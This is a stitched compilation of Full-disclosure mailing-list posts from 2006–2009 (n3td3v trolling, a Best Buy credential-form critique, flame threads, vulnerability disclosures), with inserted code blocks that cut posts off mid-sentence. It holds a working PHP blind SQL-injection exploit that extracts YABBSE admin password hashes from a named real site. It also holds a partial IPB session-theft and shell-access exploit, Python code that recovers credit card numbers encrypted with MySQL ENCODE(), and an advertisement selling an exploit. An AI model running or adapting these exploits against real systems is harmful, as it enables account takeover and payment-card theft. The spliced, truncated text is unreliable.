Yahoo chatroom security hacker scene

n3td3v will work alongside vendors to bring justice to those who dare wreak 
havoc on our reputation in the criminal underground

n3td3v is tired of the imbecilic british system of intelligence. he is moving 
deeper underground.

n3td3v is now chaos. n3td3v is now crime. n3td3v was, is and will always be 
antisec. fd will know the name of andrew wallace.

talk shit get rocked. blackhat 4 lyfe

my name is andrew wallace

and i am.

free.

0pen0wn-n3td3v.sh is copyright 2009 antisec/n3td3v. All rights reversed.

to buy our exploit contact xploita...@gmail.com and 
andrew.wall...@rocketmail.com

bids starting at 10k euros or pounds sterling. eu members only.

gfsdfge


[Full-disclosure] Twitter Pro: Best Buy's @twelpforce is full of [security] fail

2009-08-23 Thread Sam Johnston
[I hope this light weekend reading is considered on-topic for
full-disclosure but feel free to moderate/delete/ignore it if not]

Twitter Pro: Best Buy's @twelpforce is full of [security] fail
http://samj.net/2009/08/twitter-pro-best-buys-twelpforce-is.html

As you know I've been paying very close attention to Twitter this week
and while trawling through their blog looking for [ab]use of various
terms they're trying to trademark I found this little chestnut:
BestBuy, Good Stuff. Basically, "BestBuy has created a program they
call Twelpforce. The idea is that employees from across the
organization can interact quickly and easily with customers who have
questions about products". Curious I took a look at @twelpforce and
was greeted with this:

[pic]

Just in case you can't see it from here (or click through to the full
size version), the first tweet is:

@SimonTheSnowman this is true, Best Buy will rule the world. via
@mikelinsalaco

Here we have 12 year old Simon of Being Freakin' Awesome, Inc. (who
can be reached on 1337 and who blogs at http://simonthesnowmanftw.tk/)
being reassured by Mikel Insalaco: "I am the infamous Mikel Insalaco,
I am kind of a big thing. Muthasuckin Mahogany and leatherbound
books". As James Watters would say, the critique here writes itself?

This is in line with Dave Zatz's observations too in suggesting Has
Best Buy’s Twelpforce Already Failed? Dave draws attention to this
classy twelpforcer tweet (among others): "tweet tweet...im such a
homo" - definitely not the sort of thing I'd want associated with my
corporate branding, that's for sure.

This, viewers, is what Twitter has in mind for companies (having come
clean after TechCrunch aired their dirty laundry in public). They are
so excited in fact that "[they]'ve been studying how customers and
businesses interact and derive value from Twitter [and] are putting
together a document based on our studies and we'll find a spot on our
web site to share it with everyone when it's ready". Definitely
looking forward to leafing through that when it's available, though
I'm guessing there'll have to be some fairly aggressive pre-press
filtering if this is what the raw feed looks like. Despite appearances
I do rather like Twitter and hope they do well - I'm just not
convinced this is how they're going to make their millions.

Cutting to the chase, see that third tweet: "@missladii0430
#Twelpforce If you are a Best Buy employee you can sign up here. -->
http://tinyurl.com/kp8jwb via @Agent8819". That employee sign up link
takes you here: http://bbyconnect.appspot.com/connect/signup/ See the
problem yet? The first thing they ask you for is "Please enter your
Best Buy employee number and password", followed immediately by your
"Best Buy Corporate email address".

What's that? You want my name (Best Buy addresses are
firstname.lastn...@bestbuy.com), corporate email, employee number and
corporate password to be sent over the big bad Internet? To a preview
release of a service hosted by someone else? That's ok, it's
encrypted, right? WRONG. Never mind, I'll just change "http" to
"https". Wrong again. Though Google App Engine supports SSL it's
disabled for this application/URL so even though it looks like it
works you've just been silently redirected back to the insecure
address. Oops.

So here we have Best Buy soliciting corporate credentials with no
encryption whatsoever, over the public Internet (including any local,
potentially unprotected wireless), to a preview release of a service
they have little control over and, it gets better, verifying them in
real time! If you enter random details into the form it will tell you
instantly (that's right, no tarpitting or other delays) that "Employee
number or password is incorrect". Don't have a Best Buy employee
number to try? That's ok because they're only a Google search away
(along with network configuration information including server names)
and there doesn't appear to be anything stopping you from trying as
many times as you like either so brute force away.

Normally I'd have reported this via the usual channels but they've not
given any contact information whatsoever (except via public Twitter)
and besides, it's such a comedy of errors that they're probably better
off shutting it down than trying to fix it anyway. What I don't get
more than anything else is why they would bother trying to roll their
own when there are plenty of perfectly good services like CoTweet and
HootSuite that are being used with far better results by the likes of
Ford, Coke, Pepsi, JetBlue, Sprint & StarBucks.

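The two faults the post describes (a password form served and submitted over
plain http, and an https request silently bounced back to http) can be checked
mechanically. The following is an added example written for this page, not
code from the post or from Best Buy: it runs offline against constructed
responses, and the example.appspot.com host and /connect/signup/ path in the
sample data are placeholders.

```python
# Added example (not from the post or from Best Buy): an offline check for the
# two faults described above, run on constructed HTTP responses. Host and path
# in the samples are placeholders.
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class _FormScanner(HTMLParser):
    """Collect every <form>, where it submits to, and whether it holds a password field."""

    def __init__(self, page_url):
        super().__init__()
        self.page_url = page_url
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {"action": urljoin(self.page_url, a.get("action") or ""),
                             "has_password": False}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None \
                and (a.get("type") or "").lower() == "password":
            self._current["has_password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def parse_response(raw: bytes):
    """Split a raw HTTP/1.x response into (status code, lower-cased headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("iso-8859-1").split("\r\n")
    status = int(lines[0].split()[1])
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return status, headers, body.decode("utf-8", "replace")


def audit_credential_form(http_url, http_resp, https_resp):
    """Findings for a credential-collecting page.

    http_url   - the http:// URL the sign-up link points at
    http_resp  - raw response to GET http_url
    https_resp - raw response to the same request with the scheme changed to https
    """
    findings = []
    _, _, body = parse_response(http_resp)
    scanner = _FormScanner(http_url)
    scanner.feed(body)
    for form in scanner.forms:
        if not form["has_password"]:
            continue
        if urlsplit(http_url).scheme != "https":
            findings.append("password form delivered over plain http (page can be altered in transit)")
        if urlsplit(form["action"]).scheme != "https":
            findings.append(f"password form submits in clear to {form['action']}")
    status, headers, _ = parse_response(https_resp)
    location = headers.get("location", "")
    if 300 <= status < 400 and urlsplit(location).scheme == "http":
        findings.append(f"https request silently downgraded by redirect to {location}")
    return findings


# Constructed sample traffic (not captured from any real host).
SIGNUP_URL = "http://example.appspot.com/connect/signup/"
SAMPLE_HTTP = (
    b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n"
    b"<form action='/connect/signup/' method='post'>"
    b"<input name='employee_number'><input type='password' name='password'>"
    b"<input name='corp_email'><input type='submit'></form>"
)
SAMPLE_HTTPS = b"HTTP/1.1 302 Found\r\nLocation: http://example.appspot.com/connect/signup/\r\n\r\n"
```

Run `audit_credential_form(SIGNUP_URL, SAMPLE_HTTP, SAMPLE_HTTPS)` to get the
three findings for the constructed case; a page that is delivered over https,
submits to https and does not redirect produces an empty list. The real-time
"incorrect password" oracle and the absence of throttling that the post also
mentions need live requests and timing, so they are not modelled here.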


Re: [Full-disclosure] Fwd: Police probe BNP link to car fire

2008-11-24 Thread Sam Stelfox
I think you're missing my point, I haven't seen gadi get defensive enough
that it provoked the wrath of the regular posters on this list. It's
that wrath that I find so amusing.

n3td3v wrote:
> what about gadi? he's the same.
>
> On Fri, Nov 21, 2008 at 7:02 PM, Sam Stelfox <[EMAIL PROTECTED]> wrote:
>   
>> I find it terribly funny seeing how many people bash someone who has the 
>> temperament and intelligence of a high school
>> script kiddie.
>> 



Re: [Full-disclosure] Fwd: Police probe BNP link to car fire

2008-11-21 Thread Sam Stelfox
I figure this would be a good time for a first post to the list. I find
no merit in staying on this list, in fact the only reason I'm still on
this list is because I find it terribly funny seeing how many people
bash someone who has the temperament and intelligence of a high school
script kiddie. I know it's kind of sick and twisted but the responses
you get make my day.

n3td3v wrote:
> You don't actually know if anyone filters me or the opinion of anyone
> outside the full-disclosure active-user ring-of-trolls, you try and
> speak on behalf of the list valdis everyday, but the truth is you have
> no idea what the list thinks.
>
> On Fri, Nov 21, 2008 at 4:19 PM,  <[EMAIL PROTECTED]> wrote:
>   
>> On Fri, 21 Nov 2008 19:00:27 +0530, Mike C said:
>> 
>>> Yes, but it is statistically more likely you will read this if n3td3v posts
>>> it here.
>>>   
>> Actually, given the number of readers that either filter his postings
>> outright, or downgrade the interest value of something because he posts it,
>> the likelihood probably *drops*.
>>
>> "n3td3v posted it, therefore it's probably so lame that it's not worth burning
>> the recycled electrons to go read it.."
>>
>> 
>>>  Thus his posting. I sense an air of hostility towards this security
>>> researcher, and dont understand the reason
>>>   
>> You're new here, aren't you?
>>
>>
>> 
>
>   



[Full-disclosure] Be careful what you google for, you might just find it!

2007-07-06 Thread Sam Thomas
Dear List,

The following is a cautionary tale, about what happens when you go around 
searching for generic vulnerabilities. It is quite long; if you don't want to 
read it I won't be offended. From a serious security perspective it contains 
information regarding recently patched SQL injection vulnerabilities in PHPShop 
and Virtuemart, two open source e-commerce solutions. It also contains 
technical information regarding why using MySQL's "ENCODE()" function to 
obfuscate sensitive data is not a safe practice. And further why it is 
particularly dangerous in the case of well structured data such as Credit Card 
numbers. I have not informed the MySQL developers as I do not believe this is 
what the function was intended for and the product already supplies more 
suitable functions for data encryption. However it is widely being used for 
this purpose and this is still currently the case in both PHPShop and 
Virtuemart. 

This function should not in any way be considered a safe method to protect 
sensitive data such as passwords or financial details. The attack presented 
here is effective only against numerical data but could easily be extended. I 
genuinely regret having executed the google search that I did, I ended up doing 
far more work pro bono than I ever would have wanted to. Perhaps if I had a 
more criminal bent I would be sitting on a beach in the Bahamas right now 
supping cocktails telling tales of how a simple google search had made me 
millions, but instead I'm writing a lengthy post to full-disclosure. 

About two months ago I was feeling bored and so decided to do something very 
stupid. I'd done it before and regretted it then, but I couldn't help myself. I 
opened up my web browser and typed "inurl:shop sql error" into the google 
toolbar. The usual array of online shops with trivial vulnerabilities showed up.

What took my interest this time was a chain of commercially run sites that 
seemed to be prone in quite a few user submitted variables. After a few "UNION 
SELECT 1,2,3,..." queries and a quick peek at the HTML I had a query that would 
list all the payment details for an order on the system (On their demo shop of 
course). However the most critical field, the credit card number, was 
gibberish. 

At this point I decided to place a few orders of my own with arbitrary numbers 
like "111...". I ran the query again on these new entries, and it still 
returned gibberish, but interesting gibberish. It was always 16 bytes long (The 
same as the original data), and any numbers which started the same had 
corresponding gibberish which started the same. It was time to return to the 
mighty google toolbar.

I tapped in the name of the credit card field from the database. A few clicks 
later and it became apparent that the shops were based on an early version of 
PHPShop and the numbers were being processed by MySQL's "ENCODE()" function. So 
back to the toolbar and click-click-click and the algorithm used by the 
"DECODE()" function is essentially:

crypt_int(password)
{
    Take the password as a seed and do some natty stuff with a random
    number generator to make a one-one transformation from the integers
    0-255 onto themselves - Transformation[].
    Use the password again to generate a big old random number - Rand.
    Output Rand and Transformation[].
}

decode(encoded)
{
    shift=0.
    decoded="".
    for the length of encoded
    {
        shift=shift XOR myrand(Rand).
        index = (ASCII value of next character from encoded) XOR shift.
        decoded = decoded + CHR(Transformation[index]).
        shift = shift XOR Transformation[index].
    }
    Output decoded.
}

myrand(Rand)
{
    Output a sequence of pseudorandom numbers using Rand as a seed.
}

Now it was time to whip out my (not so) advanced cryptanalysis skills:

Observations:

Advanced cryptanalysis observation #1 - Credit Card numbers are 16 digits long.
Advanced cryptanalysis observation #2 - They consist of the digits 0-9 and 
nothing else.

Implications:

#1 - ACO1 means we only need consider the first 16 random numbers generated by 
myrand.
#2 - Since Transformation[] is one-one ACO2 means index is limited to 10 values.

Theorem:

It's possible to create a function capable of decoding all Credit Card numbers 
in a MySQL database if they are encoded with the "ENCODE()" function without 
knowing the password used if we know the encoded value of two simple plaintexts.

Consider the cunningly constructed plaintext "". 

Again using the fact that Transformation[] is one-one we know index takes one 
and only one value throughout the execution of the decoding algorithm. Now 
observe what happens between the generation of two digits:

index = (ASCII value of next character from encoded) XOR shift.
decoded = decoded + CHR(Transformation[index]).
shift = shift
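
An added example, not part of the post above: a Python reimplementation of the
ENCODE()/DECODE() stream cipher the post sketches, written from MySQL's
sql_crypt.cc and password.c as I recall them (treat the exact byte values as
an assumption and check them against a live server), followed by the
two-known-plaintext recovery that the post's theorem states for 16-digit,
digit-only plaintexts. The password and card number in the demo are made up.
Going slightly beyond the post, the recovery is written as a graph walk over
the relations E[p] ^ R_i = ct[i] ^ (pt[0] ^ ... ^ pt[i-1]), so any set of
known plaintexts that together cover every position and every digit works,
not only the two used here.

```python
# Added example (not from the post): MySQL ENCODE()/DECODE() as described in
# sql_crypt.cc / password.c (from memory; an assumption to verify), and the
# known-plaintext recovery for 16-digit card numbers without the password.
from collections import defaultdict

MAX_VALUE = 0x3FFFFFFF


def hash_password(password: bytes):
    """Pre-4.1 MySQL password hash: two 31-bit seeds derived from the key."""
    nr, add, nr2 = 1345345333, 7, 0x12345671
    for ch in password:
        if ch in (0x20, 0x09):              # spaces and tabs are skipped
            continue
        nr = (nr ^ ((((nr & 63) + add) * ch) + (nr << 8))) & 0xFFFFFFFF
        nr2 = (nr2 + ((nr2 << 8) ^ nr)) & 0xFFFFFFFF
        add += ch
    return nr & 0x7FFFFFFF, nr2 & 0x7FFFFFFF


class MyRand:
    """MySQL's randominit()/my_rnd() linear generator (the post's myrand)."""
    def __init__(self, seed1, seed2):
        self.seed1, self.seed2 = seed1 % MAX_VALUE, seed2 % MAX_VALUE

    def rnd(self):
        self.seed1 = (self.seed1 * 3 + self.seed2) % MAX_VALUE
        self.seed2 = (self.seed1 + self.seed2 + 33) % MAX_VALUE
        return self.seed1 / MAX_VALUE


class SqlCrypt:
    """The post's crypt_int(): a password-seeded byte permutation plus a
    keystream generator that restarts for every ENCODE()/DECODE() call."""
    def __init__(self, password: bytes):
        rng = MyRand(*hash_password(password))
        self.decode_buff = list(range(256))
        for i in range(256):                 # Transformation[] of the post
            idx = int(rng.rnd() * 255.0)
            self.decode_buff[idx], self.decode_buff[i] = self.decode_buff[i], self.decode_buff[idx]
        self.encode_buff = [0] * 256
        for i in range(256):
            self.encode_buff[self.decode_buff[i]] = i
        self.org = (rng.seed1, rng.seed2)    # Rand of the post

    def encode(self, data: bytes) -> bytes:
        rng, shift, out = MyRand(*self.org), 0, bytearray()
        for p in data:
            shift ^= int(rng.rnd() * 255.0)
            out.append(self.encode_buff[p] ^ shift)
            shift ^= p
        return bytes(out)

    def decode(self, data: bytes) -> bytes:
        rng, shift, out = MyRand(*self.org), 0, bytearray()
        for c in data:
            shift ^= int(rng.rnd() * 255.0)
            p = self.decode_buff[c ^ shift]
            out.append(p)
            shift ^= p
        return bytes(out)


def recover_tables(known_pairs):
    """Learn E[d] (encode table entry for symbol d) and R_i (XOR of the first
    i+1 keystream bytes) from known (plaintext, ENCODE output) pairs, each up
    to one unknown constant per connected component; it cancels when decoding.
    Per byte: ct[i] == E[pt[i]] ^ R_i ^ (pt[0] ^ ... ^ pt[i-1])."""
    adj = defaultdict(list)
    for pt, ct in known_pairs:
        prefix = 0
        for i, (p, c) in enumerate(zip(pt, ct)):
            w = c ^ prefix                      # == E[p] ^ R_i
            adj[("E", p)].append((("R", i), w))
            adj[("R", i)].append((("E", p), w))
            prefix ^= p
    tables = {}
    for comp, start in enumerate(list(adj)):
        if start in tables:
            continue
        tables[start] = (comp, 0)
        stack = [start]
        while stack:
            node = stack.pop()
            _, v = tables[node]
            for nb, w in adj[node]:
                if nb not in tables:
                    tables[nb] = (comp, v ^ w)
                    stack.append(nb)
                elif tables[nb] != (comp, v ^ w):
                    raise ValueError("known pairs disagree: not the same password?")
    return tables


def decode_without_password(ct: bytes, tables, alphabet=b"0123456789") -> bytes:
    """Decode ct using only what recover_tables() learnt."""
    out, prefix = bytearray(), 0
    for i, c in enumerate(ct):
        comp, r = tables[("R", i)]
        want = (comp, c ^ prefix ^ r)
        hits = [d for d in alphabet if tables.get(("E", d)) == want]
        if len(hits) != 1:                      # E is a permutation: at most one hit
            raise ValueError(f"position {i}: symbol not covered by the known plaintexts")
        out.append(hits[0])
        prefix ^= hits[0]
    return bytes(out)


def demo(password=b"shop-secret", card=b"4532015112830366") -> bytes:
    """Constructed scenario: the attacker placed two orders with chosen card
    'numbers', read their ENCODE() output through the SQL injection, and now
    decodes a real customer's stored value without the password."""
    crypt = SqlCrypt(password)
    chosen = [b"1111111111111111", b"0123456789012345"]
    tables = recover_tables([(pt, crypt.encode(pt)) for pt in chosen])
    return decode_without_password(crypt.encode(card), tables)
```

`demo()` returns the card number it was given, for any password: the first
chosen plaintext fixes R_0..R_15 relative to E['1'], the second fixes every
E[digit] relative to the same value, and the decoder then walks the target
left to right, feeding each recovered digit into the running XOR of the
plaintext prefix. Nothing in the recovery uses the password, the permutation
or the generator itself; it only needs the structure the post lays out, which
is why 16-digit, ten-symbol data is the worst possible input for this function.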

Re: [Full-disclosure] Dear Neal Krawetz, will the real n3td3v please stand up?

2007-06-18 Thread Sam
Carole Chaski gave you a run for your money tho.

http://www.securityfocus.com/comments/articles/11419/34147/threaded#34147


Dr. Neal Krawetz PhD wrote:
> If you believe my method(s) was flawed, then demonstrate your claim(s).
>
> I used a repeatable scientific proof that conclusively proves my
> findings.  People constantly criticize me, claiming that I am wrong.
> However not one of these people are able to offer a valid scientific
> argument against me or my methods!  
>
> You are acting like an uneducated child.  Is this where you are?  Did
> you even attend a school of higher learning?  I should hope that no
> respected academic institution would allow such a pea-brained fool as
> yourself entrance!
>
> Grow up, learn, and come back to speak with me once you've learned what
> logic is and how to apply it.  Until then you are nothing.  You are the
> sort of person that believes bananas are proof that there is a God, when
> the truth is there is no God.  You simple-minded doofus.
>
> - neal
>
> On Mon, Jun 18, 2007 at 05:42:07PM -0700, coderman wrote:
>   
>> On 6/18/07, HACK THE GOV <[EMAIL PROTECTED]> wrote:
>> 
>>> n3td3v is NOT Gobbles
>>> Gobbles is NOT n3td3v
>>>   
>> a biased mind peers into the chasm that is full-disclosure:
>>
>>  "my god, it's full of [n3td3v | GOBBLES] !!!"
>>
>> ... your paper was interesting and inherently flawed; may you one day
>> discover the concept of "compounded errors".
>>
>> consider GOBBLES the slim shady; n3td3v the pimply imitator in a ford
>> festiva with plywood spoiler.  all you see is one annoyance, while
>> intact intellect discerns the substance from the shallow.
>>
>> don't worry, i'm only pissing on your expert security credentials, Dr.
>> Neal Krawetz, PhD., because i too am n3td3v... disguised via
>> artificial intelligence softwarez!
>>
>>
>> "L'enfer, c'est les autres" - Sartre
>>
>> 
>
>
>   




Re: [Full-disclosure] firefox 2.0.0.2 crash

2007-03-12 Thread Sam Hocevar
On Fri, Mar 09, 2007, Tõnu Samuel wrote:

> http://people.zoy.org/~sam/firefox-crash-save-session-before-clicking.gif
> 
> I do NOT know anything else than this url. Just seen it in random
> discussion and anyone else I asked knows nothing. Current tests indicate
> that Mozilla 2.0.0.2 gets killed within second, 1.5.0.10 survives.

   I came up with that file using zzuf (http://sam.zoy.org/zzuf/).
Manpage has an example on how to fuzz Firefox.

Cheers,
-- 
Sam.



[Full-disclosure] SQL Injection in IPB <=2.1.3

2006-09-28 Thread Sam Thomas
Well this would be NDSD-06-002 but n3td3v seems to have really left... All
relevant details are in the message below, the SQL injection was patched within
a day (http://forums.invisionpower.com/index.php?showtopic=204627), I believe
the other problems still exist.

-----Original Message-----
From: Sam Thomas
Sent: 05 January 2006 02:53
To: [EMAIL PROTECTED]
Subject: vulnerability disclosure

Hi,

I write to this address as I cannot find a better one to contact you on.
Could you please forward this message to the appropriate person(s).

I write to you to disclose three vulnerabilities within the IPB software. I
came across these whilst gaining access to pzforum.net as part of the
www.rootcontest.org contest. These vulnerabilities are tested up to version
2.1.3.

Firstly I would like to make it clear that I have no intention of disclosing
these vulnerabilities to anyone other than yourselves until they are fully
rectified.

The main vulnerability exists in the lack of sanity checking on the cookie
topicsread:

if ( ! in_array( $name, array('topicsread', 'forum_read') ) )
{
    return $this->parse_clean_value(urldecode($_COOKIE[$this->vars['cookie_id'].$name]));
}
else
{
    return urldecode($_COOKIE[$this->vars['cookie_id'].$name]);
}

allows injection with variables of the form:

$injection_array = array(1=>1,"1) UNION SELECT
1,session_id,session_ip_address,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1
from ibf_admin_sessions where (1,1)=(1"=>2);

This can be used through the usercp to disclose pretty much any information,
including any files which can be accessed by load_file. (SELECT INTO OUTFILE is
also available on badly configured systems).

The second vulnerability exists in the handling of IP addresses:

$addrs[] = $_SERVER['HTTP_CLIENT_IP'];
$addrs[] = $_SERVER['REMOTE_ADDR'];
$addrs[] = $_SERVER['HTTP_PROXY_USER'];

foreach ( $addrs as $ip )
{
    if ( $ip )
    {
        $this->ip_address = $ip;
        break;
    }
}

the Client-IP header can easily be forged:

if ($sip!="") {$com.= "Client-Ip: $sip\n";}

This essentially removes any security gained by the IP element of sessions.

The third and final vulnerability exists in the mechanism for setting up tasks:

This vulnerability is only an issue once access has been gained to the admin
panel. There is a simple directory traversal exploit:

$tmppvar.= "task_file=../../uploads/av-" . $forum_member_id . ".jpg&";

Thank you for taking time to look at this, and please let me know that an
appropriate person has received it.

Thanks,
Sam

The following code was used to gain shell access to pzforum.net through these
vulnerabilities. It creates a task which points to the user's avatar, into which
s/he can place (.jpg comment field for instance) arbitrary php code, including
the passthru command etc

exploit.php:

<?php
$server = "pzforum.net";
$port = 80;

// wait between checking sessions (90 minutes)
$interval = 60*90;

$forum_root = "/";
$forum_root2 = "\/";
$forum_cookie_header = "paz";
$forum_member_id = xxx;
$forum_pass_hash = "";

$forum_validate_cookie = $forum_cookie_header . "member_id=" . $forum_member_id . ";"
    . $forum_cookie_header . "pass_hash=" . $forum_pass_hash . ";";

// get initial session_id
$injection_array = array(1=>1,"1) UNION SELECT 1,session_id,session_ip_address,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ibf_admin_sessions where (1,1)=(1"=>2);
$tmpcookie = $forum_validate_cookie . $forum_cookie_header . "topicsread=" . urlencode(serialize($injection_array)) . ";";

echo "*** ATTEMPTING TO GET OLD SESSION INFO ***\r\n";

$tmppage = getPage($server,$port,$forum_root."index.php?act=UserCP&CODE=00","",$tmpcookie);

// regex as archived: the HTML tag names inside it did not survive the list archive
if (preg_match("/]*>(.*)<\/a><\/span>[^<]*]*>(.*)<\/span>/",$tmppage,$tmpmatches))
{
    $session_id = $tmpmatches[1];
    $ip_address = $tmpmatches[2];

    echo "old session: ip - " . $ip_address . " , " . "session_id - " . $session_id . "\r\n";

    // wait for a new session
    $new_session = false;
    echo "*** WAITING FOR A NEW SESSION ***\r\n";

    while (!$new_session)
    {
        sleep($interval);
        $tmppage = getPage($server,$port,$forum_root."index.php?act=UserCP&CODE=00","",$tmpcookie);
        preg_match("/]*>(.*)<\/a><\/span>[^<]*]*>(.*)<\/span>/",$tmppage,$tmpmatches);
        if ($tmpmatches[1]==$session_id)
        {
            echo ".";
        }
        else
        {
            $session_id=$tmpmatches[1];
            $ip_address=$tm
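
The Client-IP problem in the second finding above, as an added example that is
not code from the advisory or from Invision Power: the quoted selection order
reproduced in Python beside a version that ignores client-supplied headers
unless the TCP peer is a configured proxy. The 10.0.0.0/8 proxy range and the
addresses in the sample requests are assumptions for the demonstration.

```python
# Added example (not from the advisory or Invision Power): the client-address
# selection the advisory quotes, in Python, beside a version that only believes
# a forwarding header when the TCP peer is a configured proxy. The proxy range
# and the addresses below are assumptions for the demonstration.
import ipaddress

TRUSTED_PROXIES = [ipaddress.ip_network("10.0.0.0/8")]   # assumed reverse-proxy range


def client_ip_vulnerable(environ):
    """IPB 2.1.x order: Client-IP header first, so any client can pick its own address."""
    for key in ("HTTP_CLIENT_IP", "REMOTE_ADDR", "HTTP_PROXY_USER"):
        if environ.get(key):
            return environ[key]
    return None


def client_ip_hardened(environ):
    """Trust the socket peer. Only if that peer is a known proxy, walk
    X-Forwarded-For from the right and take the first non-proxy hop."""
    peer = ipaddress.ip_address(environ["REMOTE_ADDR"])
    if not any(peer in net for net in TRUSTED_PROXIES):
        return str(peer)
    hops = [h.strip() for h in environ.get("HTTP_X_FORWARDED_FOR", "").split(",") if h.strip()]
    for hop in reversed(hops):              # rightmost entry was appended by our proxy
        try:
            addr = ipaddress.ip_address(hop)
        except ValueError:
            break                           # garbage in the header: stop trusting it
        if not any(addr in net for net in TRUSTED_PROXIES):
            return str(addr)
    return str(peer)


def session_matches(session_ip, environ, resolver=client_ip_hardened):
    """The IP element of a session check: does the request resolve to the session's address?"""
    return resolver(environ) == session_ip


# Constructed requests (CGI/WSGI environ naming).
FORGED = {"REMOTE_ADDR": "203.0.113.7", "HTTP_CLIENT_IP": "198.51.100.5"}  # attacker claims victim's IP
VIA_PROXY = {"REMOTE_ADDR": "10.0.0.2",
             "HTTP_X_FORWARDED_FOR": "1.2.3.4, 198.51.100.5, 10.0.0.3"}  # client spoofed the first hop
```

With the forged request, `client_ip_vulnerable` returns the victim's address
and the session check passes; `client_ip_hardened` returns the real peer and
it fails. Behind a proxy the hardened resolver still yields the true client,
because it reads X-Forwarded-For from the proxy's end rather than the client's.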

[Full-disclosure] NDSD-06-001

2006-06-22 Thread Sam Thomas
Hey str0ke - Are you the same str0ke whose code I've been ripping, damn I guess 
I better release my first N3td3v Sponsoring Disclosure.

NDSD-06-001: YABBSE SQL Injection
June 23, 2006

-- Sponsored post

http://lists.grok.org.uk/pipermail/full-disclosure/2006-June/046903.html

-- Affected Vendor:
The YABB SE Team

-- Affected Products:
YABBSE (This product is discontinued, but unfortunately still seems to be in 
mainstream use)

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary SQL on 
vulnerable installations of the YABBSE message board. 

The specific flaw exists within the "profile.php" php script which is used to 
give access to user profiles.

-- Vendor Response:The vendor for this product essentially no longer exists. It 
is recommended that you move to a supported message board.

-- Disclosure Timeline:
2005.06.26 - Vulnerability Discovered
2005.06.27 - Vendor found to have discontinued support
2006.06.23 - Public release of advisory

-- Vulnerability

The vulnerability exists where the user supplied variable $user is processed by 
the urldecode() function twice, this allows for the %2527 (decodes to %27 
decodes to ') SQL injection technique.

- Exploit

The following PoC exploit can be used to retrieve any user's (IE admin) password 
hash which in turn can be used to imitate and login as that user:

**BEGIN PoC Code

<?php
/* Based on http://www.milw0rm.com/exploits/1036
   so credit to str0ke and milw0rm
   jazzy2fives 2005-07-26 - mostly stolen from milw0rm.com [2005-06-08] */

$server = "www.uberhacker.com";
$user = "Dozix007";
$port = 80;

$hash = "";

$hex = "0123456789abcdef";
for ($i = 1; $i <= 32; $i++) {
    $idx = 0;
    $found = false;

    while (!$found) {
        if ($idx >= strlen($hex)) {
            // no hex digit matched: target not vulnerable or the error text changed
            die("no match at position $i\n");
        }
        $letter = substr($hex, $idx, 1);

        /* %2527 translates to %27, which gets past magic quotes. This
           is translated to ' by urldecode. */
        $url = "/cgi-pbin/board/index.php?board=;action=viewprofile;user=$user%2527+AND+mid(passwd,$i,1)=%2527" . $letter;
        $header = getHeader($server, $port, $url, "");
        if (!preg_match("/An Error Has Occurred/", $header)) {
            echo $i . ": " . $letter . "\n";
            $found = true;
            $hash .= $letter;
        } else {
            $idx++;
        }
    }
}

echo "\n\nFinal Hash: $hash\n";

// returns the whole response (headers and body) so the error text can be matched
function getHeader($server, $port, $file, $cookie) {
    $ip = gethostbyname($server);
    $fp = fsockopen($ip, $port);

    if (!$fp) {
        return "Unknown";
    }

    $com = "GET $file HTTP/1.1\r\n";
    $com .= "Host: $server:$port\r\n";
    $com .= "Connection: close\r\n";
    $com .= "\r\n";

    fputs($fp, $com);

    $header = "";
    while (!feof($fp)) {
        $header .= fread($fp, 512);
    }
    fclose($fp);

    return $header;
}
?>

** End PoC Code

-- Patch

It is recommended that if you insist on continuing the use of this product, you 
remove the line which reads "$user = urldecode($user);" from all functions in 
"\sources\profile.php"

-- Credit:

This vulnerability was discovered by me! 

-- About N3td3v Sponsoring Disclosures:

Established by me, n3td3v sponsoring disclosures (NDSD) is a system established 
to reward n3td3v for his (her?) posts to full disclosure which bring me more 
amusement than any 0-day possibly could. 

The NDSD is unique in how vulnerability information sponsors the incompetency 
of n3td3v, for each amusing n3td3v post NDSD will attempt to release a 
disclosure of a previously unknown lame exploit. This is because most valid 
complaints against n3td3v claim that (s/)he contributes nothing to the security 
community. The aim of NDSD is to sponsor n3td3v posts thus ensuring that each 
directly corresponds to a positive contribution to FULL-DISCLOSURE.

-- Misc

For anyone interested, this was the exploit used to hijack www.uberhacker.com 
- a legal hacker training site, which had as their 
primary challenge to hijack the website. The site has since had the majority of 
it's content removed.

NDSD are a subsidiary of empty vessels (www.emptyvessels.org.uk 
 ), one day we might get our website up.



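Why %2527 gets through, as an added example that is not taken from the
advisory or from YABBSE: a Python model of the decode, escape, decode order
the advisory describes for profile.php, with the same request value run
through a version that escapes only after the final decode. The members table
and memberName column are placeholder names, not YABBSE's schema.

```python
# Added example (not from the advisory): models the decode -> escape -> decode
# order in YABBSE's profile.php and why %2527 defeats it. Table and column
# names are placeholders.
from urllib.parse import unquote, unquote_plus


def addslashes(s: str) -> str:
    """PHP magic_quotes_gpc / addslashes(): backslash-escape quotes and backslashes."""
    return s.replace("\\", "\\\\").replace("'", "\\'").replace('"', '\\"')


def build_query_vulnerable(raw_user: str) -> str:
    """raw_user is the still-encoded value of ?user= from the request line.
    PHP decodes it once into $_GET, magic quotes escape what is visible then,
    and profile.php calls urldecode() again before building the SQL."""
    once = unquote_plus(raw_user)         # PHP's own query-string decoding
    escaped = addslashes(once)            # magic_quotes_gpc sees no quote in %27
    user = unquote(escaped)               # $user = urldecode($user): %27 -> '
    return f"SELECT passwd FROM members WHERE memberName='{user}'"


def build_query_fixed(raw_user: str) -> str:
    """Decode exactly once, and escape only after the last decode."""
    user = addslashes(unquote_plus(raw_user))
    return f"SELECT passwd FROM members WHERE memberName='{user}'"


# Constructed requests: the advisory's blind probe, and a plain quote for comparison.
PROBE = "Dozix007%2527+AND+mid(passwd,1,1)=%2527a"
PLAIN_QUOTE = "Dozix007%27"
```

`build_query_vulnerable(PROBE)` yields `... WHERE memberName='Dozix007' AND
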